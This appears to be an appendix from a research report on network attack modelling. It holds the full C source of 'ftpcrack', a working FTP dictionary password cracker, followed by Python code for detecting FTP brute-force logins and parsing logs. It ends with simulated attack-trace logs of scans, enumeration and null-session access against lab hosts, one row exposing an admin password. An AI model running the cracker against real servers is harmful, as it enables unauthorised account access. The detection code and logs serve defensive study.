    u_short dst_prt = 0;                    /* destination port */
    int c;                                  /* option letter */
    struct sockaddr_in peer;
    WSADATA WSAData;
    int s;                                  /* socket */
    int res = 0;                            /* result of some functions */
    int i = 0;                              /* counter */
    FILE *passwdFile;

    /* is password correct? */
    int passwdFind = 0;

    /* next password from file */
    char nextpasswd[BUFFER_SIZE];

    /* if server is closed connection this flag = 0 */
    int passwdSendAllow = 1;

    /* user's login name */
    char *username = NULL;

    /* file with dictionary of passwords */
    char *filename = NULL;

    /* current code of message from ftp server */
    int curCode;

    /* arguments */
    while((c = getopt(argc, argv, "d:u:f:")) != EOF) {
        switch (c) {
        case 'd':
            /* destination ip-address */
            /* TO_DO verify user input */
            /* we are expected ip.ip.ip.ip.port */
            if (!(cp = strrchr(optarg, '.'))) {
                usage();
            }
            *cp++ = 0;
            dst_prt = (u_short)atoi(cp);
            destination = optarg;
            if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
                libnet_error(LIBNET_ERR_FATAL, "Bad destination IP address: %s\n", optarg);
            break;
        case 'u':
            username = optarg;
            break;
        case 'f':
            filename = optarg;
            break;
        }
    }

    /* parameters are incorrect */
    if(!dst_ip || !dst_prt || !username || !filename) usage();

    if ((passwdFile = fopen(filename, "r")) == NULL) {
        printf("Cannot open password dictionary file!\n");
        usage();
    }

    /* identification of program */
    printf("Starting ftpcrack v.1.0\n");

    /* preparing for using WinSockets */
    res = WSAStartup((WORD)((1 << 8) | 1), (LPWSADATA)&WSAData);
    if(res != 0) {
        printf("WSAStartup() error, program exits now\n");
        exit(0);
    }

    /* where we want to connect? */
    /* destination ip-address convert from Internet standard dotted format into unsigned long binary representation */
    peer.sin_family = AF_INET;
    peer.sin_port = htons(dst_prt);
    peer.sin_addr.s_addr = inet_addr(destination);

    while (!(feof(passwdFile)) && !passwdFind) {
        printf("\nConnecting...\n");

        /* make a socket */
        s = socket(AF_INET, SOCK_STREAM, 0);
        if(s == INVALID_SOCKET) {
            printf("Error in socket call!\n");
            WSACleanup();
            exit(0);
        }

        /* connect to destination host */
        res = connect(s, (struct sockaddr *)&peer, sizeof(peer));
        if (res) {
            printf("Send: connecting to %s.%d Operation FAILED! (Port is seems to be CLOSED)\n\n",
                   destination, ntohs(peer.sin_port));
            exit(0);
        } else {
            printf("Send: connecting to %s.%d\n", destination, ntohs(peer.sin_port));
        }

        /* receiving reply from server */
        nNewBytes = recv(s, reply, sizeof(reply), 0);
        if (nNewBytes == SOCKET_ERROR) {
            printf("Socket Error!\n");
            exit(0);
        }
        printf("Reply: ");
        for(i = 0; i < nNewBytes; i++) printf("%c", reply[i]);

        /* if server is ready... */
        if (getFTPcode(reply, nNewBytes) == 220) {
            /* user name */
            strcpy(message, "USER ");
            strcat(message, username);
            strcat(message, " \r\n");
            printf("Send: %s", message);
            if (sendFTPcommand(s, (LPSTR)message, strlen(message)) < (int)strlen(message))
                printf("Error sending command!\n");

            /* receiving reply from server */
            nNewBytes = recv(s, reply, sizeof(reply), 0);
            if (nNewBytes == SOCKET_ERROR) {
                printf("Socket Error!\n");
                exit(0);
            }
            printf("Reply: ");
            for(i = 0; i < nNewBytes; i++) printf("%c", reply[i]);

            /* Username is ok, sending password... */
            if (getFTPcode(reply, nNewBytes) == 331) {
                passwdSendAllow = 1;
                while (passwdSendAllow) {
                    /* width limit keeps an over-long dictionary line inside nextpasswd (BUFFER_SIZE - 1) */
                    if (!(feof(passwdFile))) fscanf(passwdFile, "%1023s\n", nextpasswd); else break;
                    strcpy(message, "PASS ");
                    strcat(message, nextpasswd);
                    strcat(message, " \r\n");
                    printf("Send: %s", message);
                    if (sendFTPcommand(s, (LPSTR)message, strlen(message)) < (int)strlen(message))
                        printf("Error sending command!\n");

                    /* receiving reply from server */
                    nNewBytes = recv(s, reply, sizeof(reply), 0);
                    if (nNewBytes == SOCKET_ERROR) {
                        printf("Socket Error!\n");
                        exit(0);
                    }
                    printf("Reply: ");
                    for(i = 0; i < nNewBytes; i++) printf("%c", reply[i]);
                    curCode = getFTPcode(reply, nNewBytes);
                    if (curCode == 530) {
                        /* password incorrect */
                        printf("Bad password!\n");
                        passwdSendAllow = 0;
                    } else if (curCode == 230) {
                        /* welcome message */
                        passwdFind = 1;
                        printf("SUCCESS! Use this account and password for access to ftp-server:\n");
                        printf("USERNAME: %s\nPASSWD: %s\n", username, nextpasswd);
                        exit(0);
                    } else if ((curCode == 231) || (curCode == 503)) {
                        /* some unexpected responses from server */
                        passwdSendAllow = 0;
                    }
                }
            }
        }                                   /* ending "if server is ready" */
        closesocket(s);
    }

    fclose(passwdFile);
    WSACleanup();
    return 0;
}

void usage() {
    printf("\n");
    printf("ftpcrack v.1.0\n");
    printf("ftpcrack <arguments>\n");
    printf(" where <arguments>:\n");
    printf("<-d ip.ip.ip.ip.port> - destination host\n");
    printf("<-u username> - user's login name\n");
    printf("<-f filename> - filename with dictionary of passwords\n");
    exit(0);
}

/* function returns the FTP code of a reply from the server, for example "220", which means that the server is ready */
/* arguments: reply from server, length of reply */
int getFTPcode(LPSTR reply, int nBufLen) {

    LPSTR ftpReply;
    int i = 0;

    if (nBufLen < 4)   /* too short to hold a code and its delimiter */
        return 0;

    ftpReply = reply;

    /* skip the lines of a multi-line reply: "xyz-" opens it, continuation lines begin with three blanks */
    while ((*(ftpReply+3) == '-') || ((*(ftpReply) == ' ') && (*(ftpReply+1) == ' ') && (*(ftpReply+2) == ' '))) {
        /* find the end of the reply string */
        for (i = 0; *ftpReply != 0x0a && *ftpReply && i < nBufLen-3; ftpReply++, i++);
        ftpReply++;  /* going to beginning of reply code */
        if (!(*ftpReply))  /* no code! */
            return 0;
    }

    return atoi(ftpReply);
}

/* function sends an FTP command to the server */
/* arguments: network socket, ftp command (for example "USER username\r\n"), length of command */
int sendFTPcommand(SOCKET s, LPSTR command, int length) {
    int nBytesSent = 0;
    int nRet = 0;

    while (nBytesSent < length) {
        /* resume from the bytes already sent, so a partial send does not resend the start of the command */
        nRet = send(s, command + nBytesSent, length - nBytesSent, 0);
        if (nRet == SOCKET_ERROR) {
            printf("Socket Error!\n");
            exit(0);
        }
        nBytesSent += nRet;
    }

    return nBytesSent;
}
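The USER/PASS/reply loop above is what a server sees from the other end. As an added example that is not part of the original report, the Python below parses FTP reply codes as RFC 959 defines them (multi-line replies included, which the C getFTPcode handles by skipping continuation lines) and flags a client that collects many 530 replies for one USER name inside a short window, then a success alert if a 230 follows; the transcript, the 192.0.2.x addresses, the thresholds and the alert strings are constructed assumptions.

```python
"""Server-side detection of the USER/PASS/530 pattern in the listing above.

Added example, not part of the original report. Reply codes are parsed as
RFC 959 defines them: a multi-line reply opens with "xyz-" and is closed by
a line that starts with "xyz " (same code, then a space). The detector then
counts 530 replies per (client, USER name) in a sliding window and raises an
alert when the count reaches a threshold, plus a second alert if a 230
follows, which is the control-channel footprint of a dictionary attack.
Addresses, thresholds and the transcript below are constructed.
"""
from collections import defaultdict, deque


def ftp_reply_code(reply: str) -> int:
    """Return the 3-digit code of a complete FTP reply, or 0 if malformed."""
    lines = reply.splitlines()
    if not lines or len(lines[0]) < 3 or not lines[0][:3].isdigit():
        return 0
    code = lines[0][:3]
    if lines[0][3:4] == "-":
        # Multi-line reply: the closing line carries the same code and a space;
        # intermediate lines may begin with anything, so they are not inspected.
        if not any(line.startswith(code + " ") for line in lines[1:]):
            return 0  # no closing line yet: the reply is incomplete
    return int(code)


class FtpBruteForceDetector:
    """Track 530 replies per (client, user) inside a sliding time window."""

    def __init__(self, threshold: int = 5, window: float = 60.0):
        self.threshold = threshold
        self.window = window
        self.failures = defaultdict(deque)  # (src, user) -> 530 timestamps
        self.pending_user = {}              # src -> USER name announced last

    def observe(self, ts: float, src: str, direction: str, text: str):
        """Feed one control-channel message; return an alert string or None.

        direction is "C" for a client command, "S" for a server reply.
        """
        if direction == "C":
            verb, _, arg = text.partition(" ")
            if verb.upper() == "USER":
                self.pending_user[src] = arg.strip()
            return None
        code = ftp_reply_code(text)
        user = self.pending_user.get(src)
        if user is None or code not in (230, 530):
            return None
        q = self.failures[(src, user)]
        while q and ts - q[0] > self.window:  # forget failures outside the window
            q.popleft()
        if code == 530:
            q.append(ts)
            if len(q) == self.threshold:      # alert once when the burst is reached
                return f"ftp-bruteforce src={src} user={user} failures={len(q)}"
        elif q:                               # 230 right after recent failures
            return f"ftp-bruteforce-success src={src} user={user} after={len(q)}"
        return None


def analyze_transcript(entries, threshold=5, window=60.0):
    """Run the detector over (ts, src, direction, text) tuples; return alerts."""
    det = FtpBruteForceDetector(threshold, window)
    alerts = []
    for ts, src, direction, text in entries:
        alert = det.observe(ts, src, direction, text)
        if alert:
            alerts.append(alert)
    return alerts


def constructed_transcript():
    """Constructed session (not captured traffic): a multi-line banner, one
    legitimate login from 192.0.2.5, then a dictionary run against "admin"
    from 192.0.2.7 that succeeds on the sixth guess."""
    t = [(0.0, "192.0.2.5", "S", "220-Welcome\r\n220 Ready\r\n"),
         (1.0, "192.0.2.5", "C", "USER alice"),
         (1.2, "192.0.2.5", "S", "331 Password required for alice.\r\n"),
         (1.5, "192.0.2.5", "C", "PASS correct-horse"),
         (1.7, "192.0.2.5", "S", "230 User alice logged in.\r\n")]
    guesses = [f"guess-{n}" for n in range(1, 7)]
    ts = 10.0
    for i, guess in enumerate(guesses):
        reply = ("230 User admin logged in.\r\n" if i == len(guesses) - 1
                 else "530 Login incorrect.\r\n")
        t += [(ts, "192.0.2.7", "C", "USER admin"),
              (ts + 0.1, "192.0.2.7", "S", "331 Password required for admin.\r\n"),
              (ts + 0.2, "192.0.2.7", "C", f"PASS {guess}"),
              (ts + 0.3, "192.0.2.7", "S", reply)]
        ts += 2.0
    return t


if __name__ == "__main__":
    for line in analyze_transcript(constructed_transcript()):
        print(line)
```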

Appendix 4. Logs of attack traces and results

A4.1.  Logs  of  attack  traces  on  macro -level 

A4.1.1. Total log of the intention ABE ("Applications and Banners Enumeration") realization

Conditions  for  the  realization  of  malefactor’s  intention  ABE: 

•  protection  degree  of  network  firewall  is  “Strong”  (1); 

•  an  attacked  host  firewall  is  absent  (3). 

The attributes of the logs are as follows (they correspond to the attributes of the ontology notions Log and LogResult):

• ID - a unique number identifying the state of a state machine;

• A - state machine name;

• S - the used state of a state machine;

• Description - description of the state machine's state (except for the intermediate states); if the state is terminal, then the action description is specified; if it is non-terminal, then the description of the attack class is recorded;

• ResultComment - the description of the result that can be obtained in the used state S (if that state is terminal);

• Result - information received from the host, or a message about the successful attack in the terminal state;

• FailResult - information received from the attacked network in case the attack is blocked by a firewall.
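The attribute layout above is enough to read the logs mechanically. The following is an added example, not part of the original report: a reader for records in that layout, one '|'-separated record per line (that file format is an assumption, the report fixes none), which summarises per state machine and state which actions the firewall blocked and what each host disclosed; the sample records are constructed from values that appear in the ABE log.

```python
"""Reader for log records in the attribute layout described above.

Added example, not part of the original report: records are taken one per
line as '|'-separated fields in the order ID, A, S, Description,
ResultComment, Result, FailResult (that layout is an assumption; the report
does not fix a file format). The summary answers the two questions a reviewer
of a trace asks first: which attack actions the firewall blocked, and what
each host disclosed. The sample records are constructed from values that
appear in the ABE log.
"""
import re
from dataclasses import dataclass

FIELDS = ("id", "a", "s", "description", "result_comment", "result", "fail_result")
HOST_RE = re.compile(r"^\[(\d{1,3}(?:\.\d{1,3}){3})\]\s*(.*)$")

SAMPLE_LOG = """
1 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.135] Running Applications | |
3 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | MS IIS |
3 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | FTP-server |
10 | RCE | UDUM | Use of DumpSec | [192.168.130.0] Running Applications | | Forbidden Attack <UDUM>; Blocked by Firewall <ABE_Firewall>
11 | RCE | UDUM | Use of DumpSec | [192.168.130.135] Running Applications | MS IIS |
30 | RCE | UREG | Use of regdmp | [192.168.130.0] Running Applications | | Forbidden Attack <UREG>; Blocked by Firewall <ABE_Firewall>
"""


@dataclass
class LogRecord:
    id: int
    a: str
    s: str
    description: str
    result_comment: str
    result: str
    fail_result: str

    @property
    def host(self):
        """Address in the ResultComment's leading [..] bracket, if any."""
        m = HOST_RE.match(self.result_comment)
        return m.group(1) if m else None

    @property
    def blocked(self):
        return "Blocked by Firewall" in self.fail_result


def parse_log(text):
    """Parse one record per line; raise ValueError on a row with the wrong arity."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != len(FIELDS):
            raise ValueError(f"line {lineno}: expected {len(FIELDS)} fields, got {len(parts)}")
        records.append(LogRecord(int(parts[0]), *parts[1:]))
    return records


def summarize(records):
    """Per (A, S): the state IDs tried, those blocked by the firewall, and the
    results each host disclosed. A state with several results has one record
    per result, so IDs are collected as sets rather than counted per record."""
    summary = {}
    for r in records:
        entry = summary.setdefault((r.a, r.s),
                                   {"states": set(), "blocked": set(), "disclosed": {}})
        entry["states"].add(r.id)
        if r.blocked:
            entry["blocked"].add(r.id)
        elif r.result and r.host:
            entry["disclosed"].setdefault(r.host, set()).add(r.result)
    return summary


if __name__ == "__main__":
    for (a, s), e in sorted(summarize(parse_log(SAMPLE_LOG)).items()):
        print(a, s, "states:", sorted(e["states"]), "blocked:", sorted(e["blocked"]),
              "disclosed:", {h: sorted(v) for h, v in e["disclosed"].items()})
```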

Total  log  of  the  intention  ABE  realization  is  as  follows: 


ID | A | S | Description | ResultComment | Result | FailResult
1 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.135] Running Applications | |
2 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.138] Running Applications | |
3 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | MS IIS |
3 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | FTP-server |
3 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | Mail-server |
3 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | Microsoft Remote Registry Service |
4 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | FTP |
4 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Web-server |
4 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Mail |
4 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Telnet |
4 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Finger |
5 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | FTP |
5 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | Telnet |
5 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | Mail-server |
5 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | WWW |
5 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | Finger |
10 | RCE | UDUM | Use of DumpSec | [192.168.130.0] Running Applications | | Forbidden Attack <UDUM>; Blocked by Firewall <ABE_Firewall>
11 | RCE | UDUM | Use of DumpSec | [192.168.130.135] Running Applications | MS IIS |
11 | RCE | UDUM | Use of DumpSec | [192.168.130.135] Running Applications | Active directory |
11 | RCE | UDUM | Use of DumpSec | [192.168.130.135] Running Applications | Kerberos |
12 | RCE | UDUM | Use of DumpSec | [192.168.130.138] Running Applications | |
13 | RCE | UDUM | Use of DumpSec | [192.168.130.139] Running Applications | FTP-server |
14 | RCE | UDUM | Use of DumpSec | [192.168.130.140] Running Applications | |
15 | RCE | UDUM | Use of DumpSec | [192.168.130.141] Running Applications | |
18 | RCE | UDUM | Use of DumpSec | [192.168.130.135] Running Applications | DNS |
19 | RCE | UDUM | Use of DumpSec | [192.168.130.138] Running Applications | Microsoft Outlook |
19 | RCE | UDUM | Use of DumpSec | [192.168.130.138] Running Applications | MS Personal Web Server |
20 | RCE | UDUM | Use of DumpSec | [192.168.130.139] Running Applications | FTP-server |
20 | RCE | UDUM | Use of DumpSec | [192.168.130.139] Running Applications | Microsoft Remote Registry Service |
21 | RCE | UDUM | Use of DumpSec | [192.168.130.140] Running Applications | |
22 | RCE | UDUM | Use of DumpSec | [192.168.130.141] Running Applications | |
26 | RCE | UDUM | Use of DumpSec | [192.168.130.0] Running Applications | | Forbidden Attack <UDUM>; Blocked by Firewall <ABE_Firewall>
27 | RCE | UDUM | Use of DumpSec | [192.168.130.0] Running Applications | | Forbidden Attack <UDUM>; Blocked by Firewall <ABE_Firewall>
30 | RCE | UREG | Use of regdmp | [192.168.130.0] Running Applications | | Forbidden Attack <UREG>; Blocked by Firewall <ABE_Firewall>
31 | RCE | UREG | Use of regdmp | [192.168.130.0] Running Applications | | Forbidden Attack <UREG>; Blocked by Firewall <ABE_Firewall>
32 | RCE | UREG | Use of regdmp | [192.168.130.0] Running Applications | | Forbidden Attack <UREG>; Blocked by Firewall <ABE_Firewall>
36 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.135] Running Applications | |
37 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.138] Running Applications | |
38 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | Microsoft Remote Registry Service |
38 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | FTP-server |
38 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | MS IIS |
38 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | Mail-server |
39 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Web-server |
39 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | FTP |
39 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Telnet |
39 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Mail |
39 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Finger |
40 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | Telnet |
40 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | Mail-server |
40 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | WWW |
41 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.135] Running Applications | |
42 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.138] Running Applications | |
43 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | MS IIS |
43 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | FTP-server |
43 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | Mail-server |
43 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.139] Running Applications | Microsoft Remote Registry Service |
44 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Web-server |
44 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Finger |
44 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Mail |
44 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.140] Running Applications | Telnet |
45 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | FTP |
45 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | Telnet |
45 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | Mail-server |
45 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | WWW |
45 | ABE | FP | Connection to FTP server and examination of the prompt header | [192.168.130.141] Running Applications | Finger |
50 | RCE | UREG | Use of regdmp | [192.168.130.135] Running Applications | DNS |
51 | RCE | UREG | Use of regdmp | [192.168.130.138] Running Applications | |
52 | RCE | UREG | Use of regdmp | [192.168.130.139] Running Applications | FTP-server |
52 | RCE | UREG | Use of regdmp | [192.168.130.139] Running Applications | Microsoft Remote Registry Service |
53 | RCE | UREG | Use of regdmp | [192.168.130.140] Running Applications | |
54 | RCE | UREG | Use of regdmp | [192.168.130.141] Running Applications | |
61 | RCE | UREG | Use of regdmp | [192.168.130.0] Running Applications | | Forbidden Attack <UREG>; Blocked by Firewall <ABE_Firewall>
62 | RCE | UREG | Use of regdmp | [192.168.130.0] Running Applications | | Forbidden Attack <UREG>; Blocked by Firewall <ABE_Firewall>
65 | RCE | UREG | Use of regdmp | [192.168.130.0] Running Applications | | Forbidden Attack <UREG>; Blocked by Firewall <ABE_Firewall>
69 | ABE | UNU | Use of netcat utility for Applications Enumeration | [192.168.130.0] Running Applications | | Forbidden Attack <UNU>; Blocked by Firewall <ABE_Firewall>
70 | ABE | UNU | Use of netcat utility for Applications Enumeration | [192.168.130.0] Running Applications | | Forbidden Attack <UNU>; Blocked by Firewall <ABE_Firewall>
71 | ABE | UNU | Use of netcat utility for Applications Enumeration | [192.168.130.0] Running Applications | | Forbidden Attack <UNU>; Blocked by Firewall <ABE_Firewall>
72 | ABE | UNU | Use of netcat utility for Applications Enumeration | [192.168.130.0] Running Applications | | Forbidden Attack <UNU>; Blocked by Firewall <ABE_Firewall>
74 | END | | ATTACK IS OVER !!! | | |

A4.1 2.  Total  log  of  the  intention  GAR  (“Gaining  Access  to  Resources”)  realization 

Conditions  for  the  realization  of  malefactor’s  intention  GAR: 

•  protection  degree  of  network  firewall  is  “None”  (2); 

•  protection  degree  of  attacked  host  firewall  is  “None”  (2) ; 

•  protection  parameters  of  attacked  host  are  “Weak”  (2) ; 

•  degree  of  hacker’s  knowledge  about  a  network  is  “Nothing”  (2). 

Total  log  of  the  intention  GAR  realization  is  as  follows: 


ID | A | S | Description | ResultComment | Result | FailResult
6 | SPIS | HS | Half scan | Active Ports | 23 |
6 | SPIS | HS | Half scan | Active Ports | 137 |
6 | SPIS | HS | Half scan | Active Ports | 138 |
6 | SPIS | HS | Half scan | Active Ports | 80 |
6 | SPIS | HS | Half scan | Active Ports | 21 |
9 | SPIS | DHS | Dumb host scan | Active Ports | 80 |
9 | SPIS | DHS | Dumb host scan | Active Ports | 21 |
9 | SPIS | DHS | Dumb host scan | Active Ports | 23 |
9 | SPIS | DHS | Dumb host scan | Active Ports | 8080 |
9 | SPIS | DHS | Dumb host scan | Active Ports | 137 |
9 | SPIS | DHS | Dumb host scan | Active Ports | 138 |
10 | SPIS | DHS | Dumb host scan | Active Ports | 8080 |
10 | SPIS | DHS | Dumb host scan | Active Ports | 21 |
10 | SPIS | DHS | Dumb host scan | Active Ports | 80 |
10 | SPIS | DHS | Dumb host scan | Active Ports | 138 |
10 | SPIS | DHS | Dumb host scan | Active Ports | 137 |
10 | SPIS | DHS | Dumb host scan | Active Ports | 23 |
14 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 138 |
14 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 80 |
14 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 21 |
14 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 8080 |
14 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 137 |
15 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 8080 |
15 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 80 |
15 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 23 |
15 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 138 |
15 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 137 |
15 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 21 |
18 | SPIS | DHS | Dumb host scan | Active Ports | 8080 |
18 | SPIS | DHS | Dumb host scan | Active Ports | 138 |
18 | SPIS | DHS | Dumb host scan | Active Ports | 23 |
18 | SPIS | DHS | Dumb host scan | Active Ports | 21 |
18 | SPIS | DHS | Dumb host scan | Active Ports | 80 |
18 | SPIS | DHS | Dumb host scan | Active Ports | 137 |
22 | SPIS | SX | TCP Xmas Tree scan | Active Ports | 23 |
22 | SPIS | SX | TCP Xmas Tree scan | Active Ports | 8080 |
26 | IO | MD | Monitoring of the fragmentation prohibition bit DF | Operating System | |
27 | IO | MD | Monitoring of the fragmentation prohibition bit DF | Operating System | Windows 2000 SP3 |
30 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
31 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
32 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
33 | IO | IDOS | Examination of response for DoS attacks | Operating System | Windows SP3 |
37 | CI | NS | Collection of additional information from DNS-server | Host Names | |
41 | RE | CNS | Connection - null sessions | Null Session | Connection was done successfully |
44 | ENS | LEG | Enumerating NetBIOS Shares with Legion | Shared Resources | \\spiiran-erv\C |
44 | ENS | LEG | Enumerating NetBIOS Shares with Legion | Shared Resources | \\spiiran-erv\D |
48 | RE | CNS | Connection - null sessions | Null Session | Connection was done successfully |
49 | RE | ERD | Enumerating NT/2000 Related Domains | Related Domains | lan2.net |
53 | UE | CNS | Connection - null sessions | | |
54 | UE | EUE | Enumerating Users with enum | Users ID and Psw | Admin |
54 | UE | EUE | Enumerating Users with enum | Users ID and Psw | RtYrw_!@ |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | FTP-server |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | SNMP-agent |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | WINS-Server |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | Mail-server |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | PWS |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | DNS-server |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | MS IIS |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | MS Remote Registry Service |
58 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | MS SQL Server 2000 |
66 | SPIH | STIH | TCP connect scan | IP-addresses | |
67 | SPIH | STIH | TCP connect scan | IP-addresses | |
71 | IH | DC | Network Ping Sweeps | IP-addresses | |
75 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
79 | CI | NS | Collection of additional information from DNS-server | Host Names | |
80 | CI | NS | Collection of additional information from DNS-server | Host Names | |
84 | RE | EDNV | Enumerating NT/2000 Domains with net view | Domain Name | lan3.net |
85 | RE | EDNV | Enumerating NT/2000 Domains with net view | Domain Name | lan3.net |
86 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | spiiran-erv.lan3.net |
87 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | spiiran-erv.lan3.net |
88 | RE | CNS | Connection - null sessions | Null Session | Connection was done successfully |
91 | ENS | DUMP | Enumerating NetBIOS Shares with DumpSec | Shared Resources | \\spiiran-erv\C |
91 | ENS | DUMP | Enumerating NetBIOS Shares with DumpSec | Shared Resources | \\spiiran-erv\D |
92 | ENS | DUMP | Enumerating NetBIOS Shares with DumpSec | Shared Resources | \\spiiran-erv\C |
92 | ENS | DUMP | Enumerating NetBIOS Shares with DumpSec | Shared Resources | \\spiiran-erv\D |
93 | ENS | DUMP | Enumerating NetBIOS Shares with DumpSec | Shared Resources | \\spiiran-erv\D |
97 | RE | CNS | Connection - null sessions | | |
98 | RE | ERD | Enumerating NT/2000 Related Domains | Related Domains | lan2.net |
101 | RE | EDNV | Enumerating NT/2000 Domains with net view | Domain Name | lan3.net |
102 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | spiiran-erv.lan3.net |
103 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | spiiran-erv.lan3.net |
104 | RE | EDNV | Enumerating NT/2000 Domains with net view | Domain Name | lan3.net |
105 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | spiiran-erv.lan3.net |
109 | UE | CNS | Connection - null sessions | Null Session | Connection was done successfully |
110 | UE | DNNT | Dumping the NetBIOS Name Table with nbtstat and nbtscan | Users ID and Psw | |
113 | UE | SNMPE | SNMP Enumeration with snmputil or IP Network Browser | Users ID and Psw | |
119 | RCE | UREG | Use of regdmp | Running Applications | Mail-server |
119 | RCE | UREG | Use of regdmp | Running Applications | MS Remote Registry Service |
120 | RCE | UREG | Use of regdmp | Running Applications | SNMP-agent |
120 | RCE | UREG | Use of regdmp | Running Applications | FTP-server |
120 | RCE | UREG | Use of regdmp | Running Applications | MS SQL Server 2000 |
123 | RCE | UREG | Use of regdmp | Running Applications | Mail-server |
123 | RCE | UREG | Use of regdmp | Running Applications | WINS-Server |
130 | IH | DC | Network Ping Sweeps | IP-addresses | |
135 | SPIS | SH | TCP FIN scan | Active Ports | |
139 | SPIS | SS | TCP SYN scan | Active Ports | 138 |
139 | SPIS | SS | TCP SYN scan | Active Ports | 137 |
139 | SPIS | SS | TCP SYN scan | Active Ports | 21 |
139 | SPIS | SS | TCP SYN scan | Active Ports | 23 |
139 | SPIS | SS | TCP SYN scan | Active Ports | 8080 |
140 | SPIS | SS | TCP SYN scan | Active Ports | 23 |
140 | SPIS | SS | TCP SYN scan | Active Ports | 138 |
140 | SPIS | SS | TCP SYN scan | Active Ports | 8080 |
140 | SPIS | SS | TCP SYN scan | Active Ports | 137 |
144 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
148 | CI | NS | Collection of additional information from DNS-server | Host Names | |
149 | CI | NS | Collection of additional information from DNS-server | Host Names | |
150 | CI | NS | Collection of additional information from DNS-server | Host Names | |
